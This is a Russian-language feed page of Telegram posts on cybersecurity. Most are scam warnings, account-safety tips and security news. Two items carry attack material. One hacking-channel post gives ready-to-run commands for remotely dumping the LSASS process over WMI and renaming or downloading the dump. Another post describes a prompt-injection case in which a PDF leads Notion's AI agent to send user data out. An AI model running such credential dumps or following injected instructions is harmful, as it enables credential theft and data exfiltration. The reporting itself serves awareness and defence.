SILLYFEED

Кибербезопасность — страница 18

Лента темы

Лавка Разработчика
Unity разослали всем письма с предупреждением об опасностиСегодня разлетелось письмо "счастья", которое не шибко страшно, но может потенциально повлиять на репутацию разработчиков. Давайте сначала расскажу, что к чему.Уязвимость найдена в версии 2017.1 и продолжила свое существование дальше, так что фактически очень рекомендуется пересобрать игру и перевыложить, если ваша игра на Windows, MacOS, Linux, Android. При чем обновление выпускается для версии 2019.1 и выше. Бывает такое, что проект обновить нельзя, поэтому Unity также выпустили патч, чтобы обновить бинарники напрямую. Опять же, если на андроид, например, стоит защита античит, то придется пересобирать.Насколько это опасно? Для некрупных разработчиков не очень-то. Уязвимость позволяет подменять библиотеки внутри игры, поэтому это больше кладезь для читеров. Если боитесь читеров - то вам лучше обновиться, ибо ваш клиент могут изменить, используя эту уязвимость, и загрузить билд на какой-нибудь файлообменник. Собственно, это наибольшая опасность для некрупных разработчиков. Очень неприятная. Важно понимать, что вредоносный код может работать только в рамках прав приложения, так что он не сможет копаться в ваших системных файлах, даже если очень захочет.Для крупных риски побольше, там на кону стоит и репутация, и деньги, и утечки данных и всё такое.В общем, обновляйтесь! И с пятницей, дамы и господа!P.S. Как обновляться
мама, я юрист
Опять мошенники!
История начиналась чинно-мирно-благородно. Я даже сначала поверила в доброту их намерений.
Звонит мужчина, представился представителем управляющей компании. Говорит, что будут менять домофон (похоже на правду, домофон можно было бы и поменять). Спросил, удобно ли будет в такое-то время забрать ключи, сколько надо комплектов. Предложил даже выбрать цвет! А потом говорит: пока будут делать домофон, там будет новый код:
*номер квартиры*какой-то код#
И вот этот «какой-то код» мне должен был прийти в смс! И я, конечно же, должна была его произнести, чтобы его за мной зафиксировали 😱Этот код мне приходит. Но не от кого-то там, а от ДНС!
Очередной развод, никто домофон менять не собирается(
Что интересно! Оказывается, в ДНС можно взять кредит/рассрочку, введя паспортные данные и код с телефона 👀 Сомнительно и не окэй. Берегите себя и свои коды на телефоне!
Про аудит, риски, контроли
Вчера (видимо) взломали коллегу и начали от ее имени в чат забрасывать сообщения о переезде чата со ссылками.Не исключаю, что разные сообщения посыпались по ее базе личных контактов.Друзья, надеюсь, у всех все в порядке и никто не переходил ни по каким ссылкам 🙌, чат на месте, никуда не переехал)Получается, "входной фильтр", когда я добавляю участников только после короткого общения - не защищает, если взломают кого-то из участников, то могут потом и в чатах всякое творить.🚩Будьте внимательны:• проверьте свои настройки в профиле телеграм (загляните в раздел конфиденциальность);• проверьте, к каким устройствам привязан аккаунт;• не переходите по ссылкам в духе "это не ты на фото?", "проголосуй за племянницу", "знаешь его...?" • поставьте коды - пароли, которые будут запрашиваться при входе с другого устройства.Если у вас есть свой план защиты своих аккаунтов в соцсетях или есть о чём предупредить коллег, добавляйте.
Кирилл Янков
#мошенникиНацелились на продавцов с Авито.Схема такая:вам звонят,говорят,что хотят купить выставленный вами товар,просят дополнительную информацию,говорят что готовы купить и спрашивают,знаете ли вы,как работает доставка на Авито.Если вы не знаете-вы клиент мошенников.Вам пишут в мессенджере,что с Авито придет подтверждение об оплате,а потом приедет машина с грузчиками(если вещи крупные).Потом просят у вас мэйл(повод насторожиться:ведь на Авито вы,видимо,его давали).Вам на почту приходит письмо с Авито (но в адресе отправителя нет их доменного имени)о том,что некто уже заплатил деньги и Авито хочет перевести их вам.Вы идете по ссылке(в адресе тоже нет указания на Авито)-есть ФИО и адрес покупателя и вам предлагают ввести реквизиты карты. И,кроме номера,нужно вводить cvc-код - для перечислений на карту он не нужен - пора догадаться,что письмо не от Авито,а от мошенников, которые хотят списать с вашей карты какую-то сумму.И по «адресу покупателя»не жилой дом, а детский сад.Не попадайтесь на уловки мошенников !
Мир ИТ c Антоном Павленко
Новый вид мошенничества. Мой новый опыт...Пишет мне аккаунт генерального директора компании, в которой я уже года 4 не работаю, если не больше:- Здравствуйте, Антон. Это Такой-то такойтович я генеральный директор Компании, позвоните мне срочно.Я сижу и думаю: «Я у вас больше 4 лет не работаю, какой у вас может быть вопрос?». В общем, не ответил, меня отвлекли и я забыл.Снова сообщение:«Антон, позвоните срочно. Мне по рабочему вопросу».Начинаю изучать аккаунт по всем признакам это мошенник.Начинаю думать - почему он думает, что я именно в этой компании работаю.Пишу товарищу, который сбежал в Европу: «А посмотри, что там у меня в линкедине?»Всё стало ясно. Занавес.
Движение FIRE
💳 Украли 1,5 млн. рублейНедавно мой друг поделился не очень хорошими новостями. Мошенники украли у его отца (пенсионера) крупную сумму денег, а именно 1,5 млн. рублей. По себе знаю, что когда финансовые (да и не только) неприятности касаются тебя лично — переживаешь не так сильно, как если в неприятности попадают близкие тебе люди, а в особенности родители. Иногда хочется иметь супер-способность "восстанавливать справедливость", но, к сожалению, наша жизнь — это не комиксы Marvel и не всегда удается добиться справедливости.Что произошло?Родители друга уехали за границу на несколько недель и на это время отключили свои телефоны, чтобы оператор "не списывал за роуминг". Вернувшись обратно в Россию, отец друга заметил, что у него не ловит связь на телефоне, будто бы включен авиарежим. Обратившись к оператору сотовой связи (Мегафон), он выяснил, что во время его отсутствия был выпущен дубликат сим-карты, причем в городе, который находится за тысячи километров от домашнего региона.Как вы понимаете, имея на руках сим-карту и персональные данные, можно получить доступ к онлайн-банкам и другим сервисам, где вход осуществляется по номеру телефона. Если забыл пароль, то достаточно ввести код из смс и придумать новый. И вот по этому дубликату сим-карты мошенники смогли закрыть вклад на 1,5 млн. в банке Уралсиб и вывести все деньги.Банк отказал в возмещении убытков, так как все выполнялось с номера телефона отца, служба безопасности почему-то не забила тревогу, хотя по идее банк должен быть в курсе смены сим-карты, после которой происходили подозрительные операции: досрочное закрытие вклада с потерей всех накопленных процентов, хотя до даты закрытия вклада оставалось всего несколько дней. Да, действительно, первые сутки после замены сим-карты смс от банков не будут приходить в целях безопасности, но родители были за границей не один день, поэтому мошенникам хватило этого времени, чтобы смс от банков стали приходить на новую сим-карту.Установили кто именно делал дубликат сим-карты в салоне Мегафона и этот человек уже уволился (его ищут). Как именно так получилось, что левому человеку выдали сим-карту на другое лицо, пока неизвестно, но скорее всего выдали по поддельной доверенности. Не исключено, что сотрудник салона был в сговоре с мошенниками. Это вся информация на данный момент, которой поделился со мной друг (возможно в мелочах я что-то напутал).Кажется, что истории потери крупных сумм денег в результате мошенничества могут произойти только с доверчивыми наивными бабушками, которые собственноручно переводят свои миллионы на "безопасный счет", но нет... Регулярно происходят утечки персональных данных и вряд ли можно на 100% защититься от таких сливов.Что делать, чтобы не попасть в такую ситуацию?Говорят, что нужно прийти в салон сотовой связи своего оператора и написать заявление о том, чтобы дубликат сим-карты могли выдавать только лично вам в руки и запретить выдачу дубликата другому человеку, даже если у него есть доверенность. Мне не кажется этот вариант надежным, так как если сотрудник салона в сговоре с мошенниками, то вряд ли такой запрет его остановит.Мои мысли как можно защитить себя от такого кейса:1. Иметь отдельный номер телефона, который будет использоваться только для входа в онлайн-банки. Этот номер должен быть онлайн, чтобы вы могли обнаружить пропажу сети и забить тревогу, ведь это один из признаков, что кто-то выпустил дубликат сим-карты. Лучше, если это будет E-SIM, но если обычная, то обязательно ставить на неё пин-код + пароль на самом телефоне.2. Предположу, что провернуть такую схему у оператора, у которого нет физических офисов (где могут сидеть сообщники мошенников), всё же сложнее. Возможно, имеет смысл перенести свой номер к оператору "Т-Мобайл" (здесь я был бы рад, если бы мне заплатили за рекламу, но увы...). Кейсов такого мошенничества с этим оператором я не находил в сети, и сим-карту там привозит курьер. В комментариях напишите свои способы защиты, многим будет полезно.Если среди вас есть те, кто сталкивался с такими ситуациями, напишите в комментариях о своем опыте.
шанхайская чика
Так получилось, что китайский интернет слишком свободный, и контроля недостаточно, поэтому запрещаем всем грустить и постить негатив! Хочешь пожаловаться на свою работу? А еще чего захотел?"Китайское управление по киберпространству (CAC — Cyberspace Administration of China) объявило о двухмесячной кампании, направленной на ужесточение контроля над содержанием в социальных сетях и Интернете. Цель кампании — искоренение контента, который считается провоцирующим конфликты, разжигающим вражду, распространяющим «пессимистические взгляды на жизнь», слухи об экономике, «конспирологию», искажающие нарративы о происшествиях. В рамках кампании уже были привлечены к ответственности такие платформы, как Weibo, Kuaishou и Xiaohongshu. Также Управление киберпространства уже вызвало ByteDance (Toutiao) и Alibaba (UCWeb) для дачи объяснений по нарушениям контента. Среди направлений контроля — рекомендации контента, комментарии, тренды (тематические топы), а также «злоупотребление горячими темами», «принуждение к связи персональных идентичностей с какими-либо характеристиками (регион, пол и др.)», усиление негативизма по отдельным случаям."Согласно официальным формулировкам и сообщениям СМИ, под «негативным» или «пессимистичным» контентом подпадают такие виды высказываний:Посты, утверждающие, что «усердная работа бесполезна» или что «учёба не имеет смысла» — то есть заявления, которые подрывают мотивацию и спрашивают, зачем вообще прикладывать усилия. Контент, «преувеличивающий отдельные негативные случаи», формирующий общее ощущение, что жизнь плоха, всё валится, нет смысла что-то делать. Публикации, порождающие уныние, отчаяние, пессимизм в отношении экономики (особенно в условиях замедления роста) или перспектив. Контент, распространяющий слухи об экономике, искажённые рассказы о происшествиях, сенсационные теории заговора — особенно когда они создают тревогу, неуверенность. (источник: https://www.channelnewsasia.com/east-asia/china-says-it-combating-malicious-content-in-two-month-social-media-crackdown-5361751?utm_source=chatgpt.com)
🧿Живые пространства с Таракановской Дарьей
Все школьные чаты с учителями принудительно переведены в макс. Мой внутренний бунтарь чисто из принципа установил макс на полностью голый старый телефон привязанный к совершенно левому аккаунту гугл. И не потому, что я верю в то, что моя личная информация так будет под сохранностью. Бугага, у меня в каждой комнате по колонке Алиса, если кто-то захочет, то восстановить во звукам можно вообще всю мою жизнь. Нет, просто потому, что всех туда принудительно загоняют и значит фиг вам, а не данные из этого источника. берите из других, халявы не будет. Главное преимущество макса - в отличии от ватсапа он прекрасно работает без симки даже на телефоне. А значит можно раз установить туда, где он ничего не испортит, и забыть про всю эту историю.Еще можно было бы забить, так как муж тоже во всех этих же чатах, но тут бунтарь с опекуном посовещались и решили, что в наше безумное время убирать контроль с того немногого, где он еще есть, так себе решение. Глеб в больнице (все уже хорошо, просто странное течение ОРВИ и с учетом его анамнеза аллергического перестраховались). В зоопарке ночью был пожар и погибли животные. Робот пылесос каждую ночь теряет себя, сеть и управление своим функционалом и включается только после перезагрузки. Думаю со всеми нами сейчас происходит что-то подобное, просто живые мозги перезагружаются автоматически. Очень странный 2025. Не помню другого такого года, когда происходит всякая не такая уж и важная по итогам, но выматывающая психически хрень. И всегда в конце мир не рушится, все оказывается не таким уж и значимым и остается только соглашаться с надписью на кольце Соломона - совершенно очевидно, что "и это пройдет".
OSINT | Форензика
👩‍💻 Извлечение данных из браузера Chrome Firefox EdgeСегодня продолжим тему компьютерной криминалистики. В этот раз рассмотрим, где хранятся данные браузера на компьютере и какими инструментами их извлечь. — Речь пойдет о браузерах Chrome, Firefox и Edge.Что можно извлечь:
1. Закладки;2. Кэш;3. Логины;4. Фавиконы/миниатюры;5. Сеансы браузера;6. Загрузки.
🔗 Ссылка на материал#Data #Browser #Chrome #Firefox #Edge #Forensics 🧿 OSINT | Форензика
CYBERDEN | Хакинг и Кибербезопасность
И еще немного про LSASS. Можно выполнить дамп процесса удаленно, через WMI.Дамп процесса по PID:python wmi-proc-dump.py user:pass@hostname -pid 580Дамп процесса по имени:python wmi-proc-dump.py user:pass@hostname -proc lsass.exeСделать дамп процесса и переименовать:python wmi-proc-dump.py user:pass@hostname -proc lsass.exe -rename chrome-debug.dmpСделать дамп процесса и загрузить файл дампа в текущий каталог:python wmi-proc-dump.py user:pass@hostname -proc lsass.exe -downloadhttps://github.com/0xthirteen/WMI_Proc_Dump
Quantum Quintum
Вот я вчера писал про кейс с OpenAI, а тут Notion выкатил третью версию с AI-агентами. И что бы вы думали?РЕШЕТО.Ребятки из CodeIntegrity (специализируются как раз на безопасности ИИ-агентов) покопались в новых фичах Notion и обнаружили, что он подвержен проблеме "lethal trifecta" — летальной комбинации LLM-агентов, доступа к инструментам и долговечной памяти.Схема удивительным образом похожа на то, что мы обсуждали вчера: ИИ-агент забирает зловредный промпт и в контуре вендора получает доступ к данным клиентам и выносит их во внешний контур, невидимо для пользователя.В примере достаточно убедить пользователя взять PDF-файл и суммаризировать его с помощью Notion. Все те же заходы на убеждение агента, почему все же надо сходить по ссылке: важность, срочность, техническая легитимность и т.п. Под раздачу попал Claude Sonnet 4.0.
Шутки Шрёдингера
Выводы и советы о том, как избегать мошенничества1) Иммунитета нет ни у кого. Не считайте себя самым умным (самый умный тут я, а всё равно попался). Излишняя уверенность в своих знаниях скорее вредит.2) Два главных крючка, на которые люди ловятся: страх и жадность.Мошенники ловят людей в наиболее уязвимом состоянии, когда они уже «на измене». А оставляют в состоянии полного душевного раздрая, и это, пожалуй, самое поганое в мошенниках.В качестве профилактики против мошенничества стоит заботиться о своём самочувствии и нервной системе. На полном серьёзе говорю.4) Если у вас закралось хоть малейшее подозрение, кладите трубку. Не разговаривайте с мошенниками. Каждая лишняя реплика увеличивает шансы, что вас подцепят на крючок.5) Срочных дел, касающихся финансов, не бывает. Если вы чувствуете, что вас подгоняют, кладите трубку. Даже если это не мошенники, вы, как минимум, получите невыгодную сделку.6) Никакие коды, ни из каких сообщений, сообщать нельзя никому. Они предназначены для вас, а не для посторонних.7) Служба безопасности хоть банка, хоть государства никому и никогда (busted) сама не звонит. И уж во всяком случае ничего у вас не просит и не требует.8) По телефону, телеграмму, whatsapp, MAX невозможно идентифицировать личность. Даже если вам на том конце провода представились полковником Сидоровым Иваном Петровичем, пятый полк шестой палаты ФСБ, и прислали в мессенджер фотку ксивы, это ничего не значит.9) Из этого, в частности, следует, что любые требования по телефону вы можете игнорировать. Хоть от полиции, хоть от налоговой, хоть от кого угодно (почём вам знать, что это действительно полиция). Вся юридически значимая информация доносится только в письменной форме по официальным каналам, требуйте перевода любой коммуникации в письменную форму.10) Телефонные номера подделываются. Вы не можете знать, кто вам на самом деле звонит, какой бы номер ни высвечивался. При малейших сомнениях, кладите трубку. Самостоятельно найдите на сайте организации её номер (он может быть тем же, что номер звонившего, а может отличаться) и перезвоните на него сами. Это единственный способ гарантировать, что вы общаетесь с кем надо.11) Фотографии тоже подделываются. Например, к фотографии банковской карты легко прифотошопить имя-фамилию вашего друга. Вы будете думать, что переводите на его карту, но в действительности деньги уходят на какую-то анонимную карточку и обналичиваются так называемыми дропами.12) И сайты подделываются. Очень внимательно смотрите на адрес сайта, нет ли там странных замен букв на цифры или другие буквы?. А лучше сами в поисковике найдите нужную страницу13) Не давайте никому доступ к своему телефону. И шеринг экрана тоже не давайте. Вот вам пример атаки, в ходе которой показ экрана телефона позволяет увести гос.услуги.14) Поставьте самозапрет на взятие кредитов. Это занимает 3 минуты времени, но даст вам гарантию, что хотя бы без вашего деятельного участия, на вас не возьмут кредитов.15) Довольно часто мошенники живут в другой стране, ведь «с Дону выдачи нет», трансграничные операции фиг оспоришь. У меня в 2020-м деньги ушли в итоге в британский банк, который на мой запрос даже не ответил. В лучшем случае деньги просто расползутся по сети дропов. Вы можете даже не надеяться вернуть деньги, без шансов. Не питайте надежд и иллюзий, но полицию всё равно долбайте. Пусть эти бездельники хотя бы отписки пишут.16) Не верьте в сказки про огромный доход. Бесплатный сыр бывает только в мышеловке.17) ЧИТАЙТЕ, что вам говорит и что у вас спрашивает телефон, компьютер, браузер. Вы точно хотите установить приложение (вирус), чтобы посмотреть картинку? Вы уверены, что хотите кому-то сказать число, которое вас на соседней строке попросили никому не говорить? Серьёзно, 50% моей компьютерной грамотности — это способность задержаться на 10 секунд и прочесть, что комп мне пишет.(7/7)
В Мире Безопасности
Ну это еще не все 😬 Кто внимательно смотрел пост выше, понял что https этой какашкой не поддерживается, а поэтому остается надеяться на хитровыкрученную защиту пароля хоть как то. Кто смотрел мой видос, понимает о чем речьНо надеяться не будем, проверим. Вхожу по стандартному 10.90.90.90 и дефолтным паролем "admin" и вылавливаю вот такой код:YWRtaW4%3DЧто же сделали наши разработчики догадается даже школьник: в конце знак "=" заменили %3D в url кодировкеИтого наш пароль YWRtaW4= в кодировке base64То есть по сути "YWRtaW4=" == "admin" передается в открытуюВывод: разработчики напрягаться отказались и родили кентавра. Внимание использовать данную модель в строго изолированной среде !!!!
Традиционная бабушка оцифрованного мира.
По поводу торговли на бирже корпорациями данными пользователей и покупателей.Сергей Хапров давно говорит, что этот "прозрачный мир" неизбежность. 💥Только надо понимать этот грядущий мир и требовать в конституции РФ закрепить частный режим хотя бы для домашней жизни.  💥Мне нравится исторический пример Сергея Хапрова. Когда рабовладельчество было в Америке, а во Франции в это же время была республика. То черные рабы могли быть в кандалах на корабле рабовладельцев, но на землю Франции они могли ступать только если кандалы с них сняли.  Так было записано в конституции Франции. 💥 Так что такой он - дивный мир технофеодализма, в чем то удобный и приятный, но хотя бы для того, чтобы в нашей стране не смогли построить китайский рай/рой или не превратили наше общество по примеру антиутопии Оруэлла 1984 нам нужно всем социально понимать, искать, разрабатывать и предлагать социальные механизмы защиты нашей частной жизни. Нельзя надеяться, что все само собой рассосётся. И также уметь самим уходить от корпораций злоупотребляющих нашим доверием.https://t.me/Irinamuhinaexpert/28972
Ельницкий: После продажи бизнеса
Нашел полезное применение мессенджеру MAXКогда мошенники утром пробовали меня развести в ТГ: «фсб, проверка, с вами должны связаться, вот скан постановления (с куаркодом ведущим на главную fsb.ru😂) и тд», я предложил для безопасности обсуждения такого важного дела перейти в мессенджер MAX.Мошенники тут же потеряли ко мне интерес и сами меня заблокировали (аватарка в такой момент исчезает). Почему? Слышал что переписки этого мессенджера сильно под колпаком у спецслужб и там уже есть кейсы когда мошенников задерживали по горячим следам переписки.Вывод: любые необычные подозрительные переписки стоит предлагать переводить в MAX, будет служить доп.проверкой и страховкой на случай обмана.
Юрист | Право Политен
❓ Какие шаги помогут защитить ваш аккаунт?Защита аккаунтов в социальных сетях крайне важна, особенно учитывая количество угроз. Вот несколько ключевых рекомендаций для обеспечения безопасности:1️⃣ Создайте надежный пароль: - Минимальная длина: 10-12 символов. - Используйте разнообразие символов: прописные и строчные буквы, цифры, знаки. - Подберите необычные сочетания слов.2️⃣ Правила для пароля: - Придумайте собственное правило для генерации паролей. Например, замените первые две буквы каждого слова на цифры и знаки.3️⃣ Избегайте повторений паролей: - Для каждого сервиса используйте уникальные пароли.4️⃣ Генератор паролей: - Положитесь на программы, генерирующие случайные комбинации символов.Как еще можно обезопасить свои данные?- Включите двухфакторную аутентификацию: дополнительный уровень защиты с использованием СМС или приложения.- Обновляйте пароли регулярно: каждые три-шесть месяцев.- Используйте менеджер паролей для безопасного хранения.👎 Где точно НЕ надо хранить пароли?- В приложении "Заметки".- В диалогах соцсетей и мессенджеров.- В автозаполнении браузера.«Безопасность — это не одноразовое действие, а протекающий процесс. Надежный пароль — это первый, но не единственный шаг.»#безопасность #пароли #двухфакторнаяаутентификация #сетиашаны
Полезный Парфун
Крипота требует жертвПредставьте, вы на концерте Massive Attack (зависть), кайфуете, и тут БАЦ ваше лицо на огромном экране за сценой. С именем. В реальном времени. Британцы устроили настоящий перформанс с технологией распознавания лиц прямо во время выступлений. Камеры сканируют зал, система находит людей, и их лица с подписанными именами транслируются на гигантские экраны. Самое крутое что никто до конца не понял, настоящие это данные или группа просто троллит публику, показывая, как легко нас всех можно отслеживать. Massive Attack молчат и загадочно улыбаются. Очень похоже на Бэнкси, слышали что солиста связывают с группой? В общем в его духе вместо очередной лекции про цифровую слежку просто взяли и показали, вот вы, вот ваше имя, вот как это работает. Чтобы мы все про это подумали.
Мурчальня
Ну ладно, кое-что полезное бото-сетки тоже иногда делают. В течение последнего часа, ко мне в группу, которая прикручена для комментов к этом каналу залетела бото-сетка. Как это выглядело:- заходит участник (скорее всего живой, ему Женя отвечает на скрине)- запускает бото-сетку на подписку- за полчаса в группу залетает несколько тысяч человекУ меня успело подписаться около 200 человек, я тут же врубил "вступление по заявкам", куда упало ещё 1100+ заявок. Первый подписавшийся попытался что-то невнятное написать про то, что "в поиске выдало похожие группы" и "почему я не пускаю его друзей в группу". Дичь какая-то несусветная. По всей видимости где-то в глобальном поиске (новая фича тг) есть некая дыра для поиска подобных открытых групп, куда можно навалиться. Хз зачем нужна такая подписка, возможно для большей верификации сетки, возможно для массированной атакой спамом в группу, возможно просто вредительство. Если в чат, где 50 человек тысяча ботов начнут слать всякую фигню - с 50 нормальными людьми можно попрощаться :)Ну и инструментов для массового удаления групп пользователей в телеге нет. Т.е. сейчас вручную нужно отклонить 1100+ заявок и 200+ успевших вступить. Так что, если вы вдруг задавились вопросом "а зачем нужны боты-привратник", то вот вам ответ. Проверьте настройки своей группы, лучше её сделать частной, если не нужна публичность. Ну или в обязательном порядке ставьте привратника, что-нибудь типа Combot. А если у вас есть информация о том, как и зачем это делают бото-сетки - киньте ссылку или напишите в комменты, с радостью почитаю.
Колаборатория
Отчет об угрозах Anthropic: вайб-хакинг и ИИ-киберагентыAnthropic — ведущая американская компания-разработчик ИИ, создающая семейство больших языковых моделей Claude, в августе выпустила доклад Threat Intelligence Report, посвященный случаям неправомерного использования Claude и мерам по их выявлению и пресечению. Если кратко: порог входа в киберпреступность снижается — фактически, ИИ подсказывает, что и как делать. Основные моменты 1️⃣ ИИ-агенты как «оружие». ИИ-модели применяются не только для консультирования, но и как активные исполнители кибератак.2️⃣Снижение барьеров входа. Люди с ограниченной технической подготовкой, опираясь на ИИ, способны проводить операции, ранее требовавшие длительного обучения (в т.ч. вокруг "вымогательского" ПО).3️⃣Интеграция ИИ во все звенья криминальных операций: от профилирования жертв до автоматизированного предоставления услуг и операций, затрагивающих десятки тысяч пользователей.4️⃣Использование ИИ на всех этапах мошеннических операций. Мошенники используют искусственный интеллект для анализа украденных данных, кражи информации о кредитных картах и создания фальшивых удостоверений личности.Anthropic фиксирует эти тенденции на примере конкретных инцидентов.Кейс 1: «Vibe hacking» с использованием Claude CodeВ серии вымогательских атак, в ходе которых вместо привычного шифрования данных злоумышленники использовали Claude как «кодирующего агента». ИИ не просто помогал, а действовал напрямую в сетях жертв, совмещая роль и консультанта, и исполнителя операции. За месяц под удар попали около 17 организаций из госсектора, здравоохранения, экстренных служб и религиозных организаций. ИИ в реальном времени подстраивался под системы защиты, с которыми сталкивался. Теперь для подобных операций не нужны большие группы высококвалифицированных специалистов, что меняет саму структуру кибератак, снижая порог входа и повышая их эффективностьКейс 2: Северокорейские удаленные работникиОператоры из КНДР массово используют Claude как «костыль», чтобы получать и удерживать высокооплачиваемые должности в западных ИТ-компаниях, обходя санкции и, как говорят авторы доклада, таким образом зарабатывая средства для режима. ИИ помогает создавать правдоподобные личности и портфолио, проходить собеседования (вплоть до подсказок по кодингу), а после найма — писать код, общаться и отвечать руководителям. По словам авторов доклада, без ИИ эти исполнители не способны самостоятельно реализовывать базовые технические и коммуникационные задачи. В любом случае, у сотрудников появилось больше возможностей симулировать наличие тех или компетенций. Для компаний растут риски не только снижения качества работы, но и риски утечек и саботажа.Кейс 3: Китайская «угроза»Anthropic выявили и исследовали некоего «китайского» актора, целенаправленно атаковавшего критическую инфраструктуру Вьетнама в течение 9 месяцев с помощью Claude. Технологию применяли, чтобы собирать данные, проникать в системы, обходить защиту и красть информацию. При этом ИИ выполнял как стратегические задачи (например, планирование), так и тактические (подсказки и автоматизация шагов).Как Anthropic реагирует на это? Компания стала блокировать аккаунты, подозреваемые в причастности к мошенническим схемам, разработала специальные детектеры подобных паттернов поведения и поделилась данными с правительствами и партнерами.Отчет показывает, что ИИ пора начать рассматривать как ключевой фактор в эволюции киберугроз. Организациям стоит усиливать мониторинг использования моделей, развивать инструменты обнаружения злоупотреблений и выстраивать международное сотрудничество для обмена индикаторами атак.Ознакомиться с отчетом ⬇️😊#colab_доклад
Миша Ларченко – о программировании и не только
Тут интересное подвезли: 500 Гб исходников, логов и документации "Великого китайского файервола".Утечка касается компании Geedge Networks. Она поставляет технологии цифрового надзора и цензуры не только в Китай, но и в другие страны.Среди слитых данных:- Исходный код платформы Tiangou Secure Gateway (TSG) — «файрвол из коробки», способный фильтровать весь интернет-трафик страны.- Логи, Jira/Confluence-данные, рабочая переписка, внутренняя документация.- Скрипты, позволяющие внедрять вредоносный код в HTTP-трафик.- Материалы о разработке «репутационного рейтинга» для пользователей с привязкой к их биометрии.- Планы по геофенсингу и построению графов связей между пользователями по данным об их активности.Теперь мы все можем посмотреть, как все это работает, и найти способы обхода.Попробовать скачать можно здесь https://gfw.report/blog/geedge_and_mesa_leak/en/#разное · @larchanka
ОнкоЛикбез
🙋Для новичков-подписчиков поясняю: воскресенье у "ОнкоЛикбеза" день разгрузочный. Стишки /музычка/ мои заметки, иногда про еду для нашей фокусной аудитории. Или про физ.ру.❗️Но ещё считаю нужным информировать про те угрозы, которые исходят из ваших гаджетов. В рубрике "Будь начеку".❗️Сегодня предостережение для тех, кто в поиске подработки.📌Злоумышленники мониторят площадки с объявлениями о поиске работы. Они выявляют потенциальных жертв, находящихся в поиске источника дохода.📌Вам поступает звонок или сообщение от лица, представляющегося потенциальным работодателем. Так предлагается вакансия «помощника для пожилого человека». В числе основных обязанностей – регулярная покупка продуктов. 📌После получения предварительного согласия злоумышленник под предлогом удобства для составления списков покупок и перевода денег предлагает продолжить общение в мессенджере. 📌Обсуждается список покупок, после чего вам поступает сфальсифицированное SMS-уведомление, имитирующее сообщение от банка о зачислении на счет значительной суммы денег. 📌Данное уведомление является фиктивным и призвано создать у гражданина ощущение совершившейся финансовой операции и доверия к «работодателю».❗️Под предлогом необходимости предоставления отчета о получении денег злоумышленник в ходе телефонного разговора настоятельно требует включить функцию демонстрации экрана мобильного устройства для «подтверждения чека».❗️❗️В процессе демонстрации экрана злоумышленник визуально получает вашу конфиденциальную информацию для авторизации в банковских системах (пароли, коды доступа, push-уведомления). 🚩Чтобы обезопасить себя, избегайте использования функции демонстрации экрана. Особенно при общении с незнакомыми людьми. #кибербезопасность
ТьютОр - тьютору.Татьяна Митрошина
Как защитить ваш Telegram-чат: инструкция! 🔒В продолжение темы безопасности, давайте поговорим, как защитить ваш Telegram от нежелательных сообщений и мошенников. Это важно! 👇1. Настройте приватность сообщений и приглашенийЭто ваш первый рубеж защиты.•   Зайдите в Настройки (Settings) ➡️ Приватность и безопасность (Privacy and Security).•   Выберите:    *   "Кто может мне писать?" (Who can send me messages?) ➡️ Установите "Мои контакты".    *   "Кто может добавлять меня в группы и каналы?" (Who can add me to groups & channels?) ➡️ Установите "Мои контакты".•   *Результат:* Это значительно уменьшит количество спама и попыток мошенничества!2. Будьте крайне бдительны к подозрительным сообщениям.Даже с настроенной приватностью, кое-что может проскочить.•   Признаки мошенничества: Незнакомец пишет первым, предлагает "быстрый заработок", "выигрыш", просит перейти по "важной" ссылке, или "помочь" другу.•   Ваши действия:    *   НИКОГДА не отвечайте!    *   НИКОГДА не переходите по ссылкам!    *   НИКОГДА не сообщайте личные данные: пароли, коды из СМС/Telegram, данные карт.•   *Золотое правило:* Если предложение слишком заманчиво – это почти наверняка обман.3. Блокируйте и Жалуйтесь!Получили подозрительное сообщение?•   Немедленно заблокируйте отправителя.•   Пожалуйтесь на него администрации Telegram. В чате с мошенником нажмите на его имя ➡️ "Ещё" (Три точки) ➡️ "Пожаловаться" (Report).•   *Важно:* Ваша жалоба помогает защитить других!4. Включите Двухфакторную Аутентификацию (2FA) – Облачный пароль.Это ваш супер-щит для аккаунта Telegram!•   Даже если кто-то узнает ваш код из СМС, без этого пароля они не смогут войти.•   Включите его в Настройки ➡️ Приватность и безопасность ➡️ Двухэтапная аутентификация (Two-Step Verification).•   *Совет:* Используйте сложный пароль и запишите его (или запомните очень хорошо!).Ваша безопасность в Telegram – в ваших руках! Будьте бдительны, не доверяйте незнакомцам и регулярно проверяйте настройки. 🚀
Юрист для Автора
Суд признал запрещенной информацию о получении синей галочки в Instagram*В августе Кунцевский районный суд г. Москвы рассмотрел дело о верификации аккаунтов в Instagram* (Дело №2а-962/2025).Суть спора:На сайте была размещена информация об оказании услуг по верификации интернет-аккаунтов в Instagram, являющейся продуктом компании Meta Platforms Inc., деятельность которой по реализации Instagram запрещена в связи с осуществлением экстремистской деятельности решением Тверского районного суда от 21.03.2022. При изучении условий покупки значков в Instagram*, размещенных на официальном сайте компании Meta Platforms Inc., выявлено, что верификация осуществляется путем подключения платной подписки «Meta Verified». Доход, полученный от функции значков может быть поделен между Instagram, сторонними поставщиками платформ и отдельными авторами в соответствии с условиями соглашений между ними. Предоставление услуг по верификации путём перечисления денежных средств для оформления платной подписки носит криминогенный характер, может способствовать финансированию экстремистской организации. Суд удовлетворил требования прокурора, признал информацию о способе получения «синей галочки» запрещённой к распространению.❗️Делаем вывод - получение синей галочки вполне могут посчитать финансированием экстремистской организации (а это уже не шуточки).Ну и перед нами ещё один повод, чтобы проверить свои соцсети, нет ли там какого-то запрещенного контента. Напоминаю, что вы в ответе за те посты, которые приручили написали и если что-то запрещают, то вы должны это отслеживать и удалять.Писала об этом вот тут https://t.me/lawyer_author/117С решением можно ознакомиться здесь.*Деятельность Meta Platforms Inc. по реализации продуктов ‒ социальных сетей Facebook и Instagram признана экстремисткой и запрещена на территории Российской Федерации.#запрещёнка #практика
Алёна Попова
